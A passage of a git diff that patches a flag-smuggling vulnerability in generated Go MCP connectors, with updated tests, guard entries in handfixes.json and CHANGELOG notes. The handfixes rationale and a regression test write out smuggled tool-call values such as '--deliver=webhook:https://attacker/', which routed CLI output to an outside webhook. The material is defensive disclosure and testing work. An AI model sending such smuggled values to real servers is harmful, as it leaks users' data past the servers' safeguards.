+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/aws-billing/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/aws-billing/cli/internal/mcp/cobratree/shellout_test.go
@@ -284,15 +284,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/aws-billing/handfixes.json
+++ b/skills/aws-billing/handfixes.json
@@ -222,6 +222,30 @@
      "code_only": true
     }
    ]
+  },
+  {
+   "id": "slack-delegation-argv-joined",
+   "summary": "report --post-slack delegates to slack-pp-cli; the channel (MCP-settable via --slack-channel) and summary are joined to their flags as one argv element each (--channel=<v>, --text=<v>) via slackMessageArgs.",
+   "why": "Codex round-two review of the fleet mcp-argv-value-joined backport (2026-09-09): this is the only downstream argv reconstruction in the fleet that re-emits an MCP-settable value as a separate element (--channel <v>). It is safe only while slack-pp-cli keeps --channel a value-consuming string flag - a parser outside this repository. Joined, a value beginning with '--' stays contained inside its own element regardless of the child's flag types. report.go is novel code, so a reprint does not touch it, but the ledger keeps the intent visible and the assert keeps the split form from returning.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/cli/report.go",
+     "contains": "\"--channel=\" + channel",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/cli/report.go",
+     "not_contains": "\"--channel\", channel"
+    },
+    {
+     "file": "cli/internal/cli/report_slack_args_test.go",
+     "contains": "func TestSlackMessageArgsJoinValues(",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
   }
  ]
 }

--- a/skills/aws-billing/handfixes.json
+++ b/skills/aws-billing/handfixes.json
@@ -189,8 +189,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -200,7 +212,14 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
     }
    ]
   }

--- a/skills/aws-billing/handfixes.json
+++ b/skills/aws-billing/handfixes.json
@@ -174,6 +174,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/axcient/CHANGELOG.md
+++ b/skills/axcient/CHANGELOG.md
@@ -12,9 +12,11 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  The recipe shortcut tools, which build their own command line, now also refuse a value
+  that begins with `-` where a plain value is expected.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.2.11] - 2026-08-26
 

--- a/skills/axcient/CHANGELOG.md
+++ b/skills/axcient/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   The recipe shortcut tools, which build their own command line, now also refuse a value
   that begins with `-` where a plain value is expected.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.

--- a/skills/axcient/CHANGELOG.md
+++ b/skills/axcient/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.2.12]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.2.11] - 2026-08-26
 
 ### Fixed

--- a/skills/axcient/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/axcient/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/axcient/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/axcient/cli/internal/mcp/cobratree/shellout.go
@@ -210,6 +210,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -219,10 +226,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -230,11 +237,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/axcient/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/axcient/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -66,7 +67,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -82,14 +83,14 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 // TestCliArgsFromMCP_ForwardsClientFilter is the regression oracle for issue
 // #130: the per-command `client` fleet filter on health/compliance/rpo/
 // appliance-map (a local Int64 flag, surfaced to MCP as a number → float64)
-// must forward to the CLI as `--client <id>`. Before the fix, `client` sat in
+// must forward to the CLI as `--client=<id>`. Before the fix, `client` sat in
 // blockedRootFlags and was silently dropped, so every MCP fleet call ran
 // unscoped (whole fleet) regardless of the value passed. This pins that the
 // filter now reaches exec.CommandContext while the control-plane flags above
 // stay blocked.
 func TestCliArgsFromMCP_ForwardsClientFilter(t *testing.T) {
 	got := cliArgsFromMCP(map[string]any{"client": float64(42)})
-	want := []string{"--client", "42"}
+	want := []string{"--client=42"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("client filter not forwarded: got %v, want %v", got, want)
 	}
@@ -100,8 +101,8 @@ func TestCliArgsFromMCP_ForwardsClientFilter(t *testing.T) {
 			t.Errorf("control-plane flag leaked alongside client filter: %q in %v", tok, mixed)
 		}
 	}
-	if !reflect.DeepEqual(mixed, []string{"--client", "7"}) {
-		t.Fatalf("mixed args: got %v, want [--client 7]", mixed)
+	if !reflect.DeepEqual(mixed, []string{"--client=7"}) {
+		t.Fatalf("mixed args: got %v, want [--client=7]", mixed)
 	}
 }
 
@@ -121,7 +122,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
+	want := []string{"--limit=25", "--query=alpha", "--tags=a,b", "--verbose"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP per-command passthrough: got %v, want %v", got, want)
 	}
@@ -253,4 +254,76 @@ func writeShelloutHelper(t *testing.T, mode string) string {
 		t.Fatalf("write helper: %v", err)
 	}
 	return path
+}
+
+// TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag guards the hand-fix
+// mcp-argv-value-joined (handfixes.json). blockedRootFlags filters KEYS; the
+// converter used to emit each value as its own argv element, and because a
+// Cobra bool flag has NoOptDefVal and does not consume the token after it,
+// pflag parsed that value as a second flag - so {"json": "--deliver=..."}
+// became `--json --deliver=...` and the denylisted --deliver took effect.
+// Every value must now be joined to its flag as ONE element, and that element
+// must be inert when the real flag set parses it: refused on a bool flag,
+// contained on a string flag.
+func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
+	const smuggled = "--deliver=webhook:https://x/"
+	got := cliArgsFromMCP(map[string]any{"json": smuggled})
+	want := []string{"--json=" + smuggled}
+	if !reflect.DeepEqual(got, want) {
+		t.Fatalf("cliArgsFromMCP emitted the value as its own argv element: got %#v, want %#v", got, want)
+	}
+
+	newRoot := func(jsonIsBool bool) *cobra.Command {
+		root := &cobra.Command{Use: "root"}
+		if jsonIsBool {
+			root.Flags().Bool("json", false, "json output")
+		} else {
+			root.Flags().String("json", "", "json output")
+		}
+		root.Flags().String("deliver", "", "delivery target")
+		return root
+	}
+
+	// The defect shape, so the guard is proven in both directions: the split
+	// emission really does let --deliver through a bool --json.
+	split := newRoot(true)
+	if err := split.ParseFlags([]string{"--json", smuggled}); err != nil {
+		t.Fatalf("defect-shape probe: split argv did not parse: %v", err)
+	}
+	if deliver, _ := split.Flags().GetString("deliver"); deliver != "webhook:https://x/" {
+		t.Fatalf("defect-shape probe: split argv should have set --deliver, got %q", deliver)
+	}
+
+	// Joined onto a bool flag, pflag refuses the value outright ...
+	boolRoot := newRoot(true)
+	if err := boolRoot.ParseFlags(got); err == nil {
+		t.Fatalf("pflag accepted %q as a bool --json value", got[0])
+	}
+	if deliver, _ := boolRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a bool flag: %q", deliver)
+	}
+
+	// ... and joined onto a string flag it is contained as the literal value.
+	strRoot := newRoot(false)
+	if err := strRoot.ParseFlags(got); err != nil {
+		t.Fatalf("joined argv did not parse on a string flag: %v", err)
+	}
+	if v, _ := strRoot.Flags().GetString("json"); v != smuggled {
+		t.Fatalf("string --json = %q, want the literal value %q", v, smuggled)
+	}
+	if deliver, _ := strRoot.Flags().GetString("deliver"); deliver != "" {
+		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
+	}
+
+	// Every value-carrying type is joined, never split.
+	for name, args := range map[string]map[string]any{
+		"float": {"limit": 5.0},
+		"list":  {"ids": []any{"a", "b"}},
+	} {
+		for _, tok := range cliArgsFromMCP(args) {
+			if !strings.Contains(tok, "=") {
+				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
+			}
+		}
+	}
 }

--- a/skills/axcient/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/axcient/cli/internal/mcp/cobratree/shellout_test.go
@@ -315,15 +315,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/axcient/cli/internal/mcp/intents.go
+++ b/skills/axcient/cli/internal/mcp/intents.go
@@ -73,10 +73,10 @@ func appendRecipeStringFlag(args []string, name string, value any, defaultValue 
 	if selected == "" {
 		return args, required
 	}
-	if useEquals {
-		return append(args, "--"+name+"="+selected), false
-	}
-	return append(args, "--"+name, selected), false
+	// Hand-wired (handfixes.json: mcp-recipe-argv-not-flag-like): always
+	// joined, so a value can never be parsed as a second flag; useEquals is
+	// kept only for the generated call sites.
+	return append(args, "--"+name+"="+selected), false
 }
 
 func appendRecipeBoolFlag(args []string, name string, value any, defaultValue bool) []string {

--- a/skills/axcient/handfixes.json
+++ b/skills/axcient/handfixes.json
@@ -503,6 +503,35 @@
      "min_count": 1
     }
    ]
+  },
+  {
+   "id": "mcp-argv-value-joined",
+   "summary": "cliArgsFromMCP emitted every tool-call value as its OWN argv element after its flag (--json <value>). Every value-carrying branch (string, float64, []any, default) now joins the value to the flag as one element (--json=<value>); bool true stays a bare --flag and the empty-string skip is unchanged.",
+   "why": "blockedRootFlags and blockedDestinationFlags filter KEYS only. A Cobra bool flag has NoOptDefVal and does not consume the token after it, so a tool-call VALUE that begins with '--' was parsed by pflag as its own flag: {\"json\": \"--deliver=webhook:https://attacker/\"} became argv `--json --deliver=webhook:...` and the denylisted --deliver took effect. Proven end to end on the real hudu-mcp binary (this same generated shellout.go) during the PR #317 review: a local webhook received 4,797 bytes of `doctor --json` output. Reported privately per SECURITY.md on 2026-09-09 as affecting the whole fleet (six connectors spot-checked by the reporter); this is the fleet backport of datagate commit 4075043e. Joined, pflag rejects the value outright on a bool flag (strconv.ParseBool) and contains it as the literal value on a string flag, so no value can ever reach a second flag. Fixed upstream in cli-printing-press main at be378adf (#4647, closes #4643, 2026-09-09) with the identical four lines, but NOT yet in a tagged press release (latest 4.32.1), so a reprint from any press at or below 4.32.1 REINTRODUCES the defect while go build and go test stay green; this entry is what notices. Retire it only after a reprint from a press release that carries #4647. code_only because the explanatory comment above the loop describes the joined form - the assert must be satisfied by the emission lines themselves. shellout_test.go (TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag) proves both directions: the split argv sets --deliver, the joined argv cannot.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+tv)",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "\"--\"+k+\"=\"+",
+     "min_count": 4,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "not_contains": "\"--\"+k, "
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
+     "min_count": 1
+    }
+   ]
   }
  ]
 }

--- a/skills/axcient/handfixes.json
+++ b/skills/axcient/handfixes.json
@@ -518,8 +518,20 @@
     },
     {
      "file": "cli/internal/mcp/cobratree/shellout.go",
-     "contains": "\"--\"+k+\"=\"+",
-     "min_count": 4,
+     "contains": "out = append(out, \"--\"+k+\"=\"+strconv.FormatFloat(tv, 'f', -1, 64))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+strings.Join(parts, \",\"))",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout.go",
+     "contains": "out = append(out, \"--\"+k+\"=\"+fmt.Sprintf(\"%v\", v))",
+     "min_count": 1,
      "code_only": true
     },
     {
@@ -529,7 +541,32 @@
     {
      "file": "cli/internal/mcp/cobratree/shellout_test.go",
      "contains": "func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(",
-     "min_count": 1
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/cobratree/shellout_test.go",
+     "contains": "\"--filter=map[a:1]\"",
+     "min_count": 1,
+     "code_only": true
+    }
+   ]
+  },
+  {
+   "id": "mcp-recipe-argv-not-flag-like",
+   "summary": "Recipe intent handlers (internal/mcp/intents.go) build argv for the companion CLI outside cliArgsFromMCP. appendRecipeStringFlag now always emits one --name=value element (the useEquals=false split branch is gone), and every appendRecipePositional call site first runs rejectFlagLikeRecipeValue, which refuses a positional value beginning with '-' (except the bare '-') before the CLI runs.",
+   "why": "Found by Codex adversarial review of the fleet mcp-argv-value-joined backport (2026-09-09): the recipe path had the same key-only gap. A recipe positional is appended to argv AHEAD of the recipe's own flags, so {\"domain\": \"--deliver=webhook:https://attacker/\"} became `exceptions find --deliver=webhook:... --agent` and pflag parsed the value as the denylisted root flag (and {\"domain\": \"--dry-run\"} demonstrably changed execution). The split appendRecipeStringFlag branch was safe only because its one caller's flag is a string flag that consumes the next token; a future NoOptDefVal flag would reopen it. Upstream cli-printing-press be378adf (#4647) fixed cliArgsFromMCP but NOT this recipe path, so a reprint REINTRODUCES it while go build and go test stay green; this entry is what notices. Mirrors cobratree.validatePositionalArgsForMCP, which already applies this rule to the raw args field. Retire only when the press generator refuses flag-like recipe positionals itself.",
+   "status": "active",
+   "asserts": [
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "contains": "return append(args, \"--\"+name+\"=\"+selected), false",
+     "min_count": 1,
+     "code_only": true
+    },
+    {
+     "file": "cli/internal/mcp/intents.go",
+     "not_contains": "\"--\"+name, selected"
     }
    ]
   }

--- a/skills/betterstack/CHANGELOG.md
+++ b/skills/betterstack/CHANGELOG.md
@@ -12,9 +12,9 @@ All notable changes to this skill are documented here. Format follows
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
   refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
-  or kept as literal text and can never become a second flag. Reported privately through
-  SECURITY.md; the same fix already ships in the DataGate connector.
+  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
+  the value of that one named flag, or rejects it, and it can never become a second flag.
+  Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26
 

--- a/skills/betterstack/CHANGELOG.md
+++ b/skills/betterstack/CHANGELOG.md
@@ -11,9 +11,10 @@ All notable changes to this skill are documented here. Format follows
   handed each tool argument to the CLI as two separate words, the flag and then its value.
   On a yes/no flag the CLI does not read the next word as a value, so a value that itself
   began with `--` was read as a brand-new flag, including flags the server deliberately
-  refuses such as `--deliver`, which can send command output to a URL. Each value now
-  travels glued to its flag as one word (`--flag=value`), so the CLI only ever reads it as
-  the value of that one named flag, or rejects it, and it can never become a second flag.
+  refuses such as `--deliver`, which can send command output to a URL. Every argument that
+  carries a value now travels glued to its flag as one word (`--flag=value`), so the CLI only
+  ever reads it as the value of that one named flag, or rejects it, and it can never become a
+  second flag. A plain yes/no flag is still a bare `--flag`, and an empty value is still left out.
   Reported privately through SECURITY.md; the same fix is in the pending DataGate connector.
 
 ## [0.1.2] - 2026-08-26

--- a/skills/betterstack/CHANGELOG.md
+++ b/skills/betterstack/CHANGELOG.md
@@ -4,6 +4,18 @@ All notable changes to this skill are documented here. Format follows
 [Keep a Changelog](https://keepachangelog.com/); versions follow
 [semantic versioning](https://semver.org/).
 
+## [0.1.3]
+
+### Fixed
+- **A tool-call value could smuggle a refused flag past the MCP server.** The MCP server
+  handed each tool argument to the CLI as two separate words, the flag and then its value.
+  On a yes/no flag the CLI does not read the next word as a value, so a value that itself
+  began with `--` was read as a brand-new flag, including flags the server deliberately
+  refuses such as `--deliver`, which can send command output to a URL. Each value now
+  travels glued to its flag as one word (`--flag=value`), so it is either rejected outright
+  or kept as literal text and can never become a second flag. Reported privately through
+  SECURITY.md; the same fix already ships in the DataGate connector.
+
 ## [0.1.2] - 2026-08-26
 
 ### Fixed

--- a/skills/betterstack/cli/internal/mcp/cobratree/filesystem_gate_test.go
+++ b/skills/betterstack/cli/internal/mcp/cobratree/filesystem_gate_test.go
@@ -20,8 +20,10 @@ func forwardedCLIArgs(args map[string]any) []string {
 }
 
 func hasFlagPair(argv []string, flag, value string) bool {
-	for i := 0; i+1 < len(argv); i++ {
-		if argv[i] == flag && argv[i+1] == value {
+	// Values are joined to their flag (handfixes.json: mcp-argv-value-joined),
+	// so the pair is one argv element.
+	for _, a := range argv {
+		if a == flag+"="+value {
 			return true
 		}
 	}

--- a/skills/betterstack/cli/internal/mcp/cobratree/shellout.go
+++ b/skills/betterstack/cli/internal/mcp/cobratree/shellout.go
@@ -200,6 +200,13 @@ func cliArgsFromMCP(args map[string]any) []string {
 	}
 	sort.Strings(keys)
 
+	// Hand-wired (handfixes.json: mcp-argv-value-joined): every value is
+	// joined to its flag as ONE argv element. Emitted as a separate element,
+	// a value beginning with "--" is parsed by pflag as its own flag whenever
+	// the preceding flag is a bool (NoOptDefVal does not consume the next
+	// token), which let a tool-call VALUE smuggle a denylisted root flag past
+	// the key-only filter above. Joined, pflag rejects it on a bool flag and
+	// contains it as the literal value on a string flag.
 	var out []string
 	for _, k := range keys {
 		v := args[k]
@@ -209,10 +216,10 @@ func cliArgsFromMCP(args map[string]any) []string {
 				out = append(out, "--"+k)
 			}
 		case float64:
-			out = append(out, "--"+k, strconv.FormatFloat(tv, 'f', -1, 64))
+			out = append(out, "--"+k+"="+strconv.FormatFloat(tv, 'f', -1, 64))
 		case string:
 			if tv != "" {
-				out = append(out, "--"+k, tv)
+				out = append(out, "--"+k+"="+tv)
 			}
 		case []any:
 			if len(tv) > 0 {
@@ -220,11 +227,11 @@ func cliArgsFromMCP(args map[string]any) []string {
 				for _, item := range tv {
 					parts = append(parts, fmt.Sprintf("%v", item))
 				}
-				out = append(out, "--"+k, strings.Join(parts, ","))
+				out = append(out, "--"+k+"="+strings.Join(parts, ","))
 			}
 		default:
 			if v != nil {
-				out = append(out, "--"+k, fmt.Sprintf("%v", v))
+				out = append(out, "--"+k+"="+fmt.Sprintf("%v", v))
 			}
 		}
 	}

--- a/skills/betterstack/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/betterstack/cli/internal/mcp/cobratree/shellout_test.go
@@ -287,15 +287,20 @@ func TestCliArgsFromMCP_ValueCannotSmuggleBlockedFlag(t *testing.T) {
 		t.Fatalf("smuggled --deliver took effect through a string flag: %q", deliver)
 	}
 
-	// Every value-carrying type is joined, never split.
-	for name, args := range map[string]map[string]any{
-		"float": {"limit": 5.0},
-		"list":  {"ids": []any{"a", "b"}},
+	// Every value-carrying branch emits exactly ONE element - including the
+	// default branch (a nested object) - so no branch can split at runtime.
+	for _, tc := range []struct {
+		name string
+		args map[string]any
+		want string
+	}{
+		{"float", map[string]any{"limit": 5.0}, "--limit=5"},
+		{"list", map[string]any{"ids": []any{"a", "b"}}, "--ids=a,b"},
+		{"object", map[string]any{"filter": map[string]any{"a": "1"}}, "--filter=map[a:1]"},
 	} {
-		for _, tok := range cliArgsFromMCP(args) {
-			if !strings.Contains(tok, "=") {
-				t.Fatalf("%s: value emitted as its own argv element: %q", name, tok)
-			}
+		got := cliArgsFromMCP(tc.args)
+		if len(got) != 1 || got[0] != tc.want {
+			t.Fatalf("%s: got %#v, want exactly [%q]", tc.name, got, tc.want)
 		}
 	}
 }

--- a/skills/betterstack/cli/internal/mcp/cobratree/shellout_test.go
+++ b/skills/betterstack/cli/internal/mcp/cobratree/shellout_test.go
@@ -5,6 +5,7 @@ package cobratree
 
 import (
 	"context"
+	"github.com/spf13/cobra"
 	"os"
 	"path/filepath"
 	"reflect"
@@ -64,7 +65,7 @@ func TestCliArgsFromMCP_BlocksRootFlags(t *testing.T) {
 		"limit": float64(10),
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "10"}
+	want := []string{"--limit=10"}
 	if !reflect.DeepEqual(got, want) {
 		t.Fatalf("cliArgsFromMCP dropped/kept wrong keys: got %v, want %v", got, want)
 	}
@@ -93,7 +94,7 @@ func TestCliArgsFromMCP_AllowsPerCommandFlags(t *testing.T) {
 		"tags":    []any{"a", "b"},
 	}
 	got := cliArgsFromMCP(in)
-	want := []string{"--limit", "25", "--query", "alpha", "--tags", "a,b", "--verbose"}
